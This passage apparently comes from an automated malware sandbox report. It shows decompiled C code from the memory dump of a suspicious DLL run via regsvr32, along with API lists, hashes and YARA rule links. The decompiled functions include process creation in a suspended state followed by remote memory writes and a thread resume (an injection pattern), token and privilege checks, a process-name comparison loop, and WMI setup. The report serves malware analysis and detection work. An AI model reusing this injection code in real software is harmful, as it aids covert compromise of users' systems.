									_t62 =  *0x1001e684; // 0x2c2faa0
									if(_t61 != 0) {
										_push(0xea60);
										_push(_t85);
										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
											_t65 = _t65 + 1;
										}
										_t62 =  *0x1001e684; // 0x2c2faa0
									}
									CloseHandle(_t85);
								}
							}
						}
						if(_v40 != 0) {
							if(_t65 == 0) {
								_t52 =  *0x1001e684; // 0x2c2faa0
								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
							}
							_t48 =  *0x1001e684; // 0x2c2faa0
							 *((intOrPtr*)(_t48 + 0x30))(_v36);
							_t50 =  *0x1001e684; // 0x2c2faa0
							 *((intOrPtr*)(_t50 + 0x30))(_v40);
						}
						_t68 = _v16;
						_t47 = _v12 + 1;
						_v12 = _t47;
						if(_t47 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t82 = _v8;
					_t68 = _t68 + 1;
					_v16 = _t68;
					if(_t68 < _t82) {
						continue;
					} else {
						break;
					}
					do {
						goto L19;
					} while (_t82 != 0);
					goto L20;
				}
				L19:
				E1000861A(_t86, 0xfffffffe);
				_t86 = _t86 + 4;
				_t82 = _t82 - 1;
			}



























                  0x1000ca2b
                  0x1000ca34
                  0x1000ca37
                  0x1000ca39
                  0x1000ca3e
                  0x1000ca40
                  0x1000ca43
                  0x1000ca45
                  0x1000cb76
                  0x1000cb76
                  0x1000ca4b
                  0x1000ca54
                  0x1000ca5d
                  0x1000ca62
                  0x1000ca65
                  0x1000ca67
                  0x1000ca6c
                  0x1000cb63
                  0x1000cb69
                  0x00000000
                  0x1000cb72
                  0x1000ca72
                  0x1000ca7d
                  0x1000ca8a
                  0x1000ca8e
                  0x1000ca8f
                  0x1000ca90
                  0x1000ca94
                  0x1000ca99
                  0x1000ca9b
                  0x1000caa8
                  0x1000cab0
                  0x1000cabb
                  0x1000cac6
                  0x1000caca
                  0x1000cacc
                  0x1000cada
                  0x1000cae2
                  0x1000cae7
                  0x1000cae9
                  0x1000caee
                  0x1000caf4
                  0x1000caf6
                  0x1000caf6
                  0x1000caf7
                  0x1000caf7
                  0x1000cafd
                  0x1000cafd
                  0x1000caca
                  0x1000cab0
                  0x1000cb04
                  0x1000cb08
                  0x1000cb0a
                  0x1000cb13
                  0x1000cb13
                  0x1000cb19
                  0x1000cb21
                  0x1000cb24
                  0x1000cb2c
                  0x1000cb2c
                  0x1000cb32
                  0x1000cb35
                  0x1000cb36
                  0x1000cb3c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000cb3c
                  0x1000cb42
                  0x1000cb45
                  0x1000cb46
                  0x1000cb4b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000cb51
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000cb51
                  0x1000cb51
                  0x1000cb54
                  0x1000cb5a
                  0x1000cb5e

                  APIs
                    • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                    • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                    • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                    • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                    • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                    • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                    • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                  • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                  • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                  • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                  • String ID:
                  • API String ID: 1274669455-0
                  • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                  • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                  • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                  • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 351 1000b998-1000b9b8 GetTokenInformation 352 1000b9ba-1000b9c3 GetLastError 351->352 353 1000b9fe 351->353 352->353 355 1000b9c5-1000b9d5 call 10008604 352->355 354 1000ba00-1000ba04 353->354 358 1000b9d7-1000b9d9 355->358 359 1000b9db-1000b9ee GetTokenInformation 355->359 358->354 359->353 360 1000b9f0-1000b9fc call 1000861a 359->360 360->358
                  C-Code - Quality: 86%
                  			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E10008604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E1000861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                  0x1000b99b
                  0x1000b99c
                  0x1000b9a3
                  0x1000b9ab
                  0x1000b9af
                  0x1000b9b8
                  0x1000b9fe
                  0x1000b9fe
                  0x1000b9c5
                  0x1000b9cd
                  0x1000b9cf
                  0x1000b9d5
                  0x1000b9ee
                  0x00000000
                  0x1000b9f0
                  0x1000b9f5
                  0x00000000
                  0x1000b9fb
                  0x1000b9d7
                  0x1000b9d7
                  0x1000b9d7
                  0x1000b9d7
                  0x1000b9d5
                  0x1000ba04

                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                  • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: InformationToken$AllocErrorHeapLast
                  • String ID:
                  • API String ID: 4258577378-0
                  • Opcode ID: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
                  • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                  • Opcode Fuzzy Hash: c9dc3b6da51a4adb2593ed558e7881c6b5e21b29452045dd37928f68b6e12adc
                  • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000AE66, Relevance: 3.0, APIs: 2, Instructions: 46processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 363 1000ae66-1000aeb3 memset CreateProcessW
                  C-Code - Quality: 47%
                  			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;
				WCHAR* _t15;
				int _t19;
				struct _PROCESS_INFORMATION* _t20;

				_t20 = __edx;
				_t15 = __ecx;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t19 = 0x44;
				memset( &_v72, 0, _t19);
				_v72.cb = _t19;
				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}








                  0x1000ae6f
                  0x1000ae75
                  0x1000ae79
                  0x1000ae7a
                  0x1000ae7b
                  0x1000ae7c
                  0x1000ae80
                  0x1000ae85
                  0x1000ae8d
                  0x1000aea5
                  0x1000aeab
                  0x1000aeb3

                  APIs
                  • memset.MSVCRT ref: 1000AE85
                  • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CreateProcessmemset
                  • String ID:
                  • API String ID: 2296119082-0
                  • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                  • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                  • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                  • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000CCC0, Relevance: 2.5, APIs: 2, Instructions: 48sleepstringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 364 1000ccc0-1000ccce 365 1000ccd0-1000ccd1 364->365 366 1000cd1f-1000cd32 Sleep 364->366 367 1000ccd3-1000ccdf 365->367 368 1000cce1-1000cce7 367->368 369 1000cd15-1000cd1c 367->369 370 1000ccea-1000ccff lstrcmpi 368->370 369->367 371 1000cd1e 369->371 372 1000cd10-1000cd13 370->372 373 1000cd01-1000cd0c 370->373 371->366 372->369 373->370 374 1000cd0e 373->374 374->369
                  C-Code - Quality: 100%
                  			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
				CHAR* _v8;
				int _t28;
				signed int _t31;
				signed int _t34;
				signed int _t35;
				void* _t38;
				signed int* _t41;

				_t41 = _a8;
				_t31 = 0;
				if(_t41[1] > 0) {
					_t38 = 0;
					do {
						_t3 =  &(_t41[2]); // 0xe6840d8b
						_t34 =  *_t3;
						_t35 = 0;
						_a8 = 0;
						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}










                  0x1000ccc6
                  0x1000ccc9
                  0x1000ccce
                  0x1000ccd1
                  0x1000ccd3
                  0x1000ccd3
                  0x1000ccd3
                  0x1000ccd6
                  0x1000ccd8
                  0x1000ccdf
                  0x1000cce7
                  0x1000ccea
                  0x1000ccf4
                  0x1000ccfa
                  0x1000ccfa
                  0x1000ccff
                  0x00000000
                  0x00000000
                  0x1000cd04
                  0x1000cd05
                  0x1000cd0c
                  0x00000000
                  0x00000000
                  0x1000cd0e
                  0x00000000
                  0x1000cd0c
                  0x1000cd13
                  0x1000cd13
                  0x1000cd15
                  0x1000cd15
                  0x1000cd16
                  0x1000cd19
                  0x1000cd19
                  0x1000cd1e
                  0x1000cd26
                  0x1000cd32

                  APIs
                  • lstrcmpi.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                  • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Sleeplstrcmpi
                  • String ID:
                  • API String ID: 1261054337-0
                  • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                  • Instruction ID: cde0d477192250e791ba25b7cb0ca9c4b7eae4faf087914376a22588bee842ac
                  • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
                  • Instruction Fuzzy Hash: 21018031600709EFEB10DF69C884D5AB7E5FF843A4725C47AE95A8B215D730E942DB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10005E96, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 375 10005e96-10005eb5 ExitProcess
                  C-Code - Quality: 100%
                  			E10005E96() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}




                  0x10005e96
                  0x10005ea3
                  0x10005ead

                  APIs
                  • ExitProcess.KERNEL32(00000000), ref: 10005EAD
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                  • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
                  • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
                  • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 100085EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 377 100085ef-10008603 HeapCreate
                  C-Code - Quality: 100%
                  			E100085EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}




                  0x100085f8
                  0x100085fe
                  0x10008603

                  APIs
                  • HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                  • Instruction ID: f703af9baad619bee9f37dfa55c6143b3da77678d96310d0b12c6411cce6613a
                  • Opcode Fuzzy Hash: 21e30d703b760380db77e66f3654ad7d37bd304b680c7c4cfdef8daab914962f
                  • Instruction Fuzzy Hash: B9B012B0A8471096F2901B204C86B047550A308B0AF308001F708581D0C6B05104CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000BA62, Relevance: 1.3, APIs: 1, Instructions: 82COMMON
                  Download Yara Rule
                  C-Code - Quality: 47%
                  			E1000BA62(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B946(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B998(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E1000861A( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x2c2fc68
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x2c2fc68
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x2c2fc68
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                  0x1000ba69
                  0x1000ba6b
                  0x1000ba72
                  0x1000ba74
                  0x1000ba77
                  0x1000ba7c
                  0x1000ba81
                  0x1000ba8b
                  0x1000ba8e
                  0x1000ba91
                  0x1000ba96
                  0x1000ba98
                  0x1000ba9e
                  0x1000bafe
                  0x1000bb06
                  0x1000bb0c
                  0x1000bb13
                  0x1000bb19
                  0x00000000
                  0x1000bb1a
                  0x1000baa3
                  0x1000baa4
                  0x1000baa5
                  0x1000baa6
                  0x1000baa7
                  0x1000baa8
                  0x1000baa9
                  0x1000baaa
                  0x1000baaf
                  0x1000bab1
                  0x1000bab6
                  0x1000bab7
                  0x1000bac1
                  0x00000000
                  0x00000000
                  0x1000bac5
                  0x1000baf1
                  0x1000baf1
                  0x1000baf9
                  0x1000bafc
                  0x00000000
                  0x1000bafc
                  0x1000bac7
                  0x1000bac7
                  0x1000baca
                  0x1000bacd
                  0x1000bacd
                  0x1000bad0
                  0x1000bad2
                  0x1000badc
                  0x00000000
                  0x00000000
                  0x1000bae1
                  0x1000bae2
                  0x1000bae5
                  0x1000baea
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000baec
                  0x1000baf0
                  0x00000000
                  0x1000baf0
                  0x1000bb1f

                  APIs
                    • Part of subcall function 1000B946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B959
                    • Part of subcall function 1000B946: OpenThreadToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B960
                    • Part of subcall function 1000B946: GetLastError.KERNEL32(?,?,1000BA7C,74EC17D9,10000000), ref: 1000B967
                    • Part of subcall function 1000B946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B980
                    • Part of subcall function 1000B946: OpenProcessToken.ADVAPI32(00000000,?,?,1000BA7C,74EC17D9,10000000), ref: 1000B987
                    • Part of subcall function 1000B998: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                    • Part of subcall function 1000B998: GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                  • CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Token$CurrentErrorLastOpenProcessThread$CloseHandleInformation
                  • String ID:
                  • API String ID: 1020899596-0
                  • Opcode ID: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                  • Instruction ID: 211ecb97cd29a0990eca88f75de2d619fb9b913ff1731f7459bcb712159e1349
                  • Opcode Fuzzy Hash: 3029ab77cace5704be6ef2a1eb7c1f1fb731f9b7037353be42344427220f5465
                  • Instruction Fuzzy Hash: A5217F71A00615AFEB00DFA9CC85EAEB7F8EF04380F514069F601E7165D770ED008B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000BA05, Relevance: 1.3, APIs: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E1000BA05() {
				signed int _v8;
				signed int _v12;
				intOrPtr _t15;
				void* _t16;
				void* _t18;
				void* _t21;
				intOrPtr _t22;
				void* _t24;
				void* _t30;

				_v8 = _v8 & 0x00000000;
				_t15 =  *0x1001e68c; // 0x2c2fc68
				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
				if(_t16 != 0) {
					_v12 = _v12 & 0x00000000;
					_t18 = E1000B998(1,  &_v12); // executed
					_t30 = _t18;
					if(_t30 != 0) {
						CloseHandle(_v8);
						_t21 = _t30;
					} else {
						if(_v8 != _t18) {
							_t22 =  *0x1001e684; // 0x2c2faa0
							 *((intOrPtr*)(_t22 + 0x30))(_v8);
						}
						_t21 = 0;
					}
					return _t21;
				} else {
					return _t16;
				}
			}












                  0x1000ba0a
                  0x1000ba12
                  0x1000ba1a
                  0x1000ba1f
                  0x1000ba29
                  0x1000ba32
                  0x1000ba37
                  0x1000ba3c
                  0x1000ba5a
                  0x1000ba5d
                  0x1000ba3e
                  0x1000ba41
                  0x1000ba43
                  0x1000ba4b
                  0x1000ba4b
                  0x1000ba4e
                  0x1000ba4e
                  0x1000ba61
                  0x1000ba22
                  0x1000ba22
                  0x1000ba22

                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
                  • Instruction ID: 27834edd58ae92e11893d12f29fcf0d32ff10038b2ecb69362011e86f4a7d187
                  • Opcode Fuzzy Hash: cf8ea1d0ee699ffff2a7d6578a9032d28315730fc6a38588bf4ed6563c659023
                  • Instruction Fuzzy Hash: 58F06432A10619EFEB10DBA4C98AE9E77F8EB453D9F5280A8F001E7155EB70DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 30%
                  			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                  0x1000d530
                  0x1000d533
                  0x1000d536
                  0x1000d547
                  0x1000d54d
                  0x1000d55e
                  0x1000d566
                  0x1000d5b7
                  0x1000d5b7
                  0x1000d5bc
                  0x1000d5c1
                  0x1000d5c1
                  0x1000d5c4
                  0x1000d5c9
                  0x1000d5ce
                  0x1000d5ce
                  0x1000d5d1
                  0x1000d568
                  0x1000d569
                  0x1000d56f
                  0x1000d580
                  0x1000d585
                  0x00000000
                  0x1000d587
                  0x1000d594
                  0x1000d59c
                  0x00000000
                  0x1000d59e
                  0x1000d5a0
                  0x1000d5a8
                  0x00000000
                  0x1000d5aa
                  0x1000d5ad
                  0x1000d5b3
                  0x1000d5b3
                  0x1000d5a8
                  0x1000d59c
                  0x1000d585
                  0x1000d5d6

                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                  • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                  • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                  • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  Memory Dump Source
